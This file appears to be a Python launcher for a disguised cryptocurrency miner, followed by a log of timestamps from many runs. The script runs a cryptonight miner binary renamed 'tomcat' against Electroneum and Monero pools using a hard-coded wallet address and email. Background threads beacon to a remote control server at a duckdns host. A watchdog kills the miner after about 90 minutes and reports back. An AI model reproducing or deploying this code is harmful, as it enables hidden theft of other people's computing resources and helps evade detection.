import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:27:07.140667
#2018-02-17 16:14:04.150234
#2018-02-17 18:01:06.618492
#2018-02-17 19:50:06.465708
#2018-02-17 21:39:06.167984
#2018-02-17 23:23:04.876481
#2018-02-18 01:12:05.910468
#2018-02-18 02:59:06.099591
#2018-02-18 04:48:07.034657
#2018-02-18 06:38:01.440770
#2018-02-18 08:27:07.111565
#2018-02-18 10:15:06.693823
#2018-02-18 12:01:03.626305
#2018-02-18 13:46:04.738613
#2018-02-18 15:34:01.953144
#2018-02-18 17:22:05.473204
#2018-02-18 19:11:05.169333
#2018-02-18 20:57:06.249408
#2018-02-18 22:44:06.186922
#2018-02-19 00:33:06.748931
#2018-02-19 02:17:07.972309
#2018-02-19 04:06:04.668553
#2018-02-19 05:50:09.475045
#2018-02-19 07:40:09.789291
#2018-02-19 09:30:03.851990
#2018-02-19 11:19:05.384275
#2018-02-19 13:06:04.974263
#2018-02-19 14:54:04.568013
#2018-02-19 16:41:05.423042
#2018-02-19 18:28:05.563979
#2018-02-19 20:13:06.550106
#2018-02-19 22:04:08.712268
#2018-02-19 23:51:06.798749
#2018-02-20 01:38:04.611371
#2018-02-20 03:26:05.682191
#2018-02-20 05:13:04.230851
#2018-02-20 06:55:07.972384
#2018-02-20 08:42:04.043266
#2018-02-20 10:25:09.137015
#2018-02-20 12:11:08.059325
#2018-02-20 13:58:08.671099
#2018-02-20 15:41:06.164790
#2018-02-20 17:27:01.628203
#2018-02-20 19:16:04.102162
#2018-02-20 21:04:01.740840
#2018-02-20 22:51:04.072245
#2018-02-21 00:33:05.402674
#2018-02-21 02:18:07.011476
#2018-02-21 04:05:07.867183
#2018-02-21 05:52:07.678139
#2018-02-21 07:40:09.850598
#2018-02-21 09:25:07.945811
#2018-02-21 11:14:06.526500
#2018-02-21 13:01:06.444995
#2018-02-21 14:48:06.748377
#2018-02-21 16:35:01.334704
#2018-02-21 18:24:09.006310
#2018-02-21 20:11:07.122633
#2018-02-21 21:58:02.266576
#2018-02-21 23:46:03.859744
#2018-02-22 01:36:07.892198
#2018-02-22 03:24:05.228113
#2018-02-22 05:12:04.724269
#2018-02-22 06:56:06.310773
#2018-02-22 08:43:02.202732
#2018-02-22 10:29:07.933084
#2018-02-22 12:14:05.568588
#2018-02-22 14:00:01.827901
#2018-02-22 15:47:01.885890
#2018-02-22 17:33:10.789916
#2018-02-22 19:19:07.614122
#2018-02-22 21:10:08.507643
#2018-02-22 22:56:06.787325
#2018-02-23 00:44:03.738482
#2018-02-23 02:32:07.847499
#2018-02-23 04:20:08.389669
#2018-02-23 06:05:09.119545
#2018-02-23 07:50:08.235170
#2018-02-23 09:53:07.331282
#2018-02-23 11:57:07.944723
#2018-02-23 13:46:01.904993
#2018-02-23 15:34:08.649023
#2018-02-23 17:24:06.257729
#2018-02-23 19:11:06.372485
#2018-02-23 20:55:07.936472
#2018-02-23 22:42:05.422062
#2018-02-24 00:29:05.169358
#2018-02-24 02:19:07.560666
#2018-02-24 04:10:02.989601
#2018-02-24 05:58:03.806632
#2018-02-24 07:45:05.703513
#2018-02-24 09:31:07.841799
#2018-02-24 11:26:04.250960
#2018-02-24 13:15:08.611247
#2018-02-24 15:08:02.198267
#2018-02-24 16:56:03.372145
#2018-02-24 18:43:07.378473
#2018-02-24 20:34:07.525972
#2018-02-24 22:37:04.866496
#2018-02-25 01:44:05.992405
#2018-02-25 04:56:01.541106
#2018-02-25 09:24:01.978928